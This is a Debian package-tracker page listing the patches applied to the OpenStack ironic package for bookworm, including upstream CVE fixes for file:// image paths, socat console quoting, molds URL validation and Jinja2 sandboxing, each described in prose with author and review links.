Debian Patches
Status for ironic/1:21.1.0-3+deb12u1
| Patch | Description | Author | Forwarded | Bugs | Origin | Last update |
|---|---|---|---|---|---|---|
| adds-alembic.ini-in-MANIFEST.in.patch | Fixes MANIFEST.in so that alembic.ini is packaged | Thomas Goirand <zigo@debian.org> | no | 2016-03-22 | ||
| py3.11_fix_unit_tests.patch | Fix unit tests for Python 3.11 Mocks can no longer be provided as the specs for other Mocks. See https://github.com/python/cpython/issues/87644 and https://docs.python.org/3.11/whatsnew/3.11.html for more info. diff --git a/ironic/tests/unit/drivers/modules/irmc/test_inspect.py b/ironic/tests/unit/drivers/modules/irmc/test_inspect.py index 5c66cb9..da91ec6 100644 |
Riccardo Pittau <elfosardo@gmail.com> | no | debian | upstream, https://review.opendev.org/c/openstack/ironic/+/866861 | 2022-12-09 |
| CVE-2025-44021_OSSA-2025-001_Disallow_unsafe_image_file_paths.patch | CVE-2025-44021 / OSSA-2025-001: Disallow unsafe image file:// paths Before this change, Ironic did not filter file:// paths when used as an image source except to ensure they were a file (and not, e.g. a character device). This is problematic from a security perspective because you could end up with config files from well-known paths being written to disk on a node. . The allowlist default list is huge, but it includes all known usages of file:// URLs across Bifrost, Ironic, Metal3, and OpenShift in both CI and default configuration. . For the backportable version of this patch for stable branches, we have omitted the unconditional block of system paths in order to permit operators using those branches to fully disable the new security functionality. =================================================================== |
Jay Faulkner <jay@jvf.cc> | yes | debian upstream | upstream, https://review.opendev.org/c/openstack/ironic/+/949176 | 2025-03-12 |
| CVE-2026-42510_Shell-quote_console_command_passed_to_socat.patch | CVE-2026-42510: Shell-quote console command passed to `socat` Applies shell quoting to console command passed to `socat`'s EXEC:. diff --git a/ironic/drivers/modules/console_utils.py b/ironic/drivers/modules/console_utils.py index c5e9e85..3019866 100644 |
Afonne-CID <afonnepaulc@gmail.com> | yes | debian upstream | upstream, https://review.opendev.org/c/openstack/ironic/+/986418 | 2026-04-22 |
| CVE-2026-42997_OSSN-2026-010_validate_molds_url_against_swift_in_keystone_catalog.patch | CVE-2026-42997 / OSSN-2026-010: security: validate molds url against swift in keystone catalog Adds a security check to ensure the URL "netloc", i.e. hostname and port, matches the user supplied URL if the configuration molds feature for Dell hardware goes down the path of attempting to get or set the URL. This works by sending the url to the authorization code and handling checking the URL there as a safety check prior to proceeding. diff --git a/ironic/common/molds.py b/ironic/common/molds.py index 234fcc6..ec61116 100644 |
Julia Kreger <juliaashleykreger@gmail.com> | yes | debian upstream | upstream, https://review.opendev.org/c/openstack/ironic/+/986817 | 2026-05-07 |
| CVE-2026-44916_Use_sandbox_rendering_for_jinja2.patch | CVE-2026-44916: security: Use sandbox rendering for jinja2 Analysis revealed that a malicious attacker with sufficent access to request a node to be provisioned could supply a maliciously crafted kickstart template configuration, which would then be rendered in an unsafe form ultimately. . This is because the underlying render utility was modeled for rendering only admin-suppied files or the in-code tree files. Anaconda had to take this further by allowing the jinja utilized to be user supplied. . Anyhow, an attacker with sufficient access, an ironic deployment with the anaconda deploy interface, a node with the anaconda deployment interface set by an admin, and a malicious template could result in conductor internal data being rendered and if the infrastucture operator is allowing traffic egress for the provisioning network, could have sensitive internal data exfiled out of the environment. . The render helper has been changed to utilize a sandboxed environment. Attacks such as this now internally raise a Jinja2 SecurityError. =================================================================== |
Julia Kreger <juliaashleykreger@gmail.com> | yes | upstream | upstream, https://review.opendev.org/c/openstack/ironic/+/987778 | 2026-05-08 |
All known versions for source package 'ironic'
- 1:35.0.1-3 (sid, forky)
- 1:29.0.5-0+deb13u1 (trixie-proposed-updates)
- 1:29.0.0-7 (trixie)
- 1:21.1.0-3+deb12u1 (bookworm-proposed-updates)
- 1:21.1.0-3 (bookworm)